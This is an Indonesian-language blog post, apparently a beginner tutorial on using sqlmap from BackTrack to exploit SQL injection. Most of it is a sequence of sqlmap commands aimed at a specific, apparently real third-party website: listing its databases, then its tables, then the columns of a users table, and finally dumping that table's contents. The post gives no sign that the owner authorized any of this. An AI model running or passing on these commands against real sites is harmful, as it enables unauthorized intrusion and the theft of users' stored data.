Menggunakan tools sqlmap

Tools sql Map digunakan untuk mengeksploitasi web yang mempunyai kelemahan pada error sql, biasanya url yang mempunyai lubang keamanan jika ditambahkan karakter string akan menghasilkan pesan error, ini memungkinkan bisa diexploitasi.

1.buka sqlmap.

Application – Backtrack – Exploitation – Web Exploitation Tools – SqlMAP

2.setelah terbuka tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 –dbs

-u       = url
–dbs  = kita mencari nama databasenya…

3. Setelah ketemu nama databasenya yaitu=”uselessj_uj2006″
tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 –tables

-D            = nama database yang sudah kita temukan tadi
–tables     = untuk mencari nama table..

4. Nama table akan keluar dan hasilny ternyata ada table user,.
oke untuk melihat isi columnsny tuliskan syntax berikut…:)
ex= python sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users –columns 

 

 

lanjut..
ex= pytho sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users –dump

fungsi dump untuk mengambil semua isi di table admin..hasil dump bisa diliat di dir sqlmap itu sendiri..;)

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s